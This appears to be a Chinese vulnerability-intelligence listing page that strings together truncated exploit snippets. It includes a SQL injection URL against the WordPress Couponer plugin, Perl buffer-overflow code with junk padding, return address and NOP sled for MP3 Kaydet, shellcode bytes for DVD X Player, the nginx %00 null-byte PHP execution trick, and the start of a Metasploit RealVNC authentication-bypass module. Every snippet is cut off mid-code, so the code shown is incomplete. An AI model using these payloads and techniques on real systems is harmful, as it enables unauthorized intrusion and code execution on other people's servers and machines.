漏洞情报263
WordPress的Couponer插件
http://www.xxxx.com/wp-content/plugins/couponer/print-coupon.php?ID=-1' UNION ALL SELECT 1,version()
...
MP3 Kaydet本地缓冲区溢出
my $file= "Exploit.m3u";
my $junk= "x41" x 1600;
my $ret= "xEBx5Dx3Ex5F"
my $nop ="x90" x 20
my $she
...
WordPress插件SH Slideshow
下载地址: http://downloads.wordpress.org/plugin/sh-slideshow.3.1.4.zip
影响版本: 3.1.4 (已测试)
---------------
...
Nginx %00空字节执行任意代码(php)漏洞
Ngnix在遇到%00空字节时与后端FastCGI处理不一致,导致可以在图片中嵌入PHP代码然后通过访问xxx.jpg%00.php来执行其中的代码
影响版本:
nginx 0.5.*
nginx 0
...
DVD X Player 5.5 Professional (.plf) Universal Buffer Overflow
$shellcode = $shellcode . "x89xe5xd9xc2xd9x75xf4x5dx55x59x49x49x49x49x43".
"x43x43x43x43x43x51x5ax56
...
恢复Myfiles中3.8.4.3300的DLL劫持漏洞
# Tested on : win SP2 + SP3 Fr / Back | Track 5 fr
################################################
...
RealVNC的验证绕道
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
...
近期评论